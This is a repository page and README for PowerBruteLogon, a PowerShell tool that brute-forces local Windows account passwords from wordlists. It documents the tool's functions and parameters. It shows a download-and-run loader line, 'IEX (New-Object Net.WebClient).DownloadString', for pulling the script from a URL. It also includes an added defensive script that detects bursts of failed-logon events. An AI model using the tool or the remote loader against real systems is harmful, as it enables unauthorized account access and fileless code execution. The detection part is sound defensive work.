  • Stars: 105
  • Rank: 328,196 (Top 7 %)
  • Language: PowerShell
  • License: Apache License 2.0
  • Created about 3 years ago
  • Updated over 1 year ago


PowerBruteLogon (Ported version of WinBruteLogon in pure PowerShell)

PowerBruteLogon

PowerBruteLogon is a ported version of WinBruteLogon in pure PowerShell

⚠️ Notice: this version is slower than WinBruteLogon but has the serious advantage of being written entirely in PowerShell. In the near future, password attempts will be distributed to separate threads to speed up the process. Also keep in mind that this method is very noisy: each failed attempt is logged in the Microsoft Windows Event Logs.

You might find useful information about the technique used in this PoC here
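
Because each failed attempt is logged, a defender can spot this activity as a burst of failed logons against a single account. The following is an added example, not part of PowerBruteLogon or its author's code; it assumes failed-logon auditing is enabled so that Security event ID 4625 is recorded, and the function names, threshold and window size are hypothetical choices.

```powershell
# Added example, not part of PowerBruteLogon.
# Assumes "Audit Logon" failure auditing is enabled so event 4625 is written.

function Find-FailedLogonBurst {
    param(
        [Parameter(Mandatory)] [AllowEmptyCollection()]
        [object[]] $Records,         # objects with TimeCreated and TargetUserName
        [int] $Threshold = 10,       # assumed tuning value: failures per window
        [int] $WindowSeconds = 60    # assumed tuning value: sliding window size
    )
    $Records | Group-Object TargetUserName | ForEach-Object {
        $name  = $_.Name
        $times = @($_.Group | Sort-Object TimeCreated | ForEach-Object { $_.TimeCreated })
        $start = 0; $peak = 0
        for ($end = 0; $end -lt $times.Count; $end++) {
            # Advance the left edge until the window spans at most $WindowSeconds
            while (($times[$end] - $times[$start]).TotalSeconds -gt $WindowSeconds) { $start++ }
            $peak = [math]::Max($peak, $end - $start + 1)
        }
        if ($peak -ge $Threshold) {
            [pscustomobject]@{ TargetUserName = $name; Failures = $times.Count; PeakInWindow = $peak }
        }
    }
}

# Read live 4625 records (needs an elevated session) into the same shape.
function Get-FailedLogonEvent {
    param([datetime] $Since = (Get-Date).AddHours(-1))
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4625; StartTime = $Since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $data = @{}
            foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            [pscustomobject]@{
                TimeCreated    = $_.TimeCreated
                TargetUserName = $data['TargetUserName']
                LogonType      = $data['LogonType']
            }
        }
}

# Constructed sample: 12 failures in 12 seconds for 'alice', 2 spread-out failures for 'bob'
$t0 = Get-Date '2024-01-01T10:00:00'
$sample  = @(0..11 | ForEach-Object { [pscustomobject]@{ TimeCreated = $t0.AddSeconds($_); TargetUserName = 'alice' } })
$sample += [pscustomobject]@{ TimeCreated = $t0; TargetUserName = 'bob' }
$sample += [pscustomobject]@{ TimeCreated = $t0.AddMinutes(30); TargetUserName = 'bob' }
Find-FailedLogonBurst -Records $sample
# Live use: Find-FailedLogonBurst -Records @(Get-FailedLogonEvent)
```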


Usage

You can use this PowerShell application either as a PowerShell script or as a PowerShell module.

Import a new PowerShell Module (Generic Explanation)

To be available, the module must first be present in a registered module path.

You can list module paths with the following command:

Write-Output $env:PSModulePath

Example Output:

C:\Users\Phrozen\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules

Copy the module file <module_name>.psm1 to the desired module path.

You can use the command below to check if your module was successfully imported:

Get-Module -ListAvailable

Example Output:

PS C:\Users\Phrozen\Desktop> Get-Module -ListAvailable


    Directory: C:\Users\Phrozen\Documents\WindowsPowerShell\Modules


ModuleType Version    Name                                ExportedCommands
---------- -------    ----                                ----------------
Manifest   <version>  <module_name>                       <available_exported_commands>

<..snip..>

If you don't see it, run the following command and check back.

Import-Module <module_name>

Import a new PowerShell Script (Generic Explanation)

It is not mandatory to install this application as a PowerShell module (even though the file extension is *.psm1).

You can also load it as a PowerShell script. Multiple methods exist, including:

Invoking Commands Using:

IEX (Get-Content .\<module_name>.psm1 -Raw)

Loading script from a remote location:

IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/<module_name>.psm1')

Available Functions

Invoke-BruteLogonAccount
Invoke-BruteLogonList
Invoke-BruteAvailableLogons

Invoke-BruteLogonAccount

Attempt to recover the password of a single defined Windows User Account.

Parameters
Parameter | Type | Default | Description
Username (*) | String | None | Target Microsoft Windows local user account
WordList (*) | String | None | Text file location containing password candidates

* = Mandatory Options

Example
Invoke-BruteLogonAccount -Username "darkcodersc" -Wordlist "C:\Temp\Wordlist.txt"


Invoke-BruteLogonList

Attempt to recover the passwords of a list of Windows user accounts.

Parameters
Parameter | Type | Default | Description
UserList (*) | String | None | Text file location containing user candidates
WordList (*) | String | None | Text file location containing password candidates

* = Mandatory Options

Example
Invoke-BruteLogonList -UserList "C:\Temp\users.txt" -WordList "C:\Temp\Wordlist.txt"

Invoke-BruteAvailableLogons

Attempt to recover the password of all available local Windows User Accounts.

Parameters
Parameter | Type | Default | Description
IgnoreUsers | Array Of String | None | A list of usernames to ignore
WordList (*) | String | None | Text file location containing password candidates

* = Mandatory Options

Example
Invoke-BruteAvailableLogons -WordList "C:\Temp\Wordlist.txt"

Invoke-BruteAvailableLogons -WordList "C:\Temp\Wordlist.txt" -IgnoreUsers "Phrozen"


Account Lockout Behaviour

PowerBruteLogon supports account lockout detection. When account lockout is configured on Windows (⚠️ recommended), you will see the following message printed on screen:

[Screenshot: Invoke-BruteLogonAccount]

Remove progress bar

You might find the PowerShell progress bar annoying; if so, you can remove the code below:

# Display Progress / Stats
$perc = [math]::Round((100 * $currPos) / $candidateCount)
$activity = [string]::Format("Testing candidate ""{0}"" for username ""{1}""", $candidate, $targetUser)
$status = [string]::Format("$perc% Complete:{0}/{1}", $currPos, $candidateCount)

Write-Progress -Activity $activity -Status $status -PercentComplete $perc

Disclaimer

We are doing our best to prepare the content of this app. However, PHROZEN SASU and / or Jean-Pierre LESUEUR cannot warrant the expressions and suggestions of the contents, as well as its accuracy. In addition, to the extent permitted by the law, PHROZEN SASU and / or Jean-Pierre LESUEUR shall not be responsible for any losses and/or damages due to the usage of the information on our app.

By using our app, you hereby consent to our disclaimer and agree to its terms.

Any links contained in our app that may lead to external sites are provided for convenience only. Any information or statements that appeared in these sites or app are not sponsored, endorsed, or otherwise approved by PHROZEN SASU and / or Jean-Pierre LESUEUR. For these external sites, PHROZEN SASU and / or Jean-Pierre LESUEUR cannot be held liable for the availability of, or the content located on or through them, nor for any losses or damages arising from using these contents or the internet generally.


Made with ❤️ in 🇫🇷
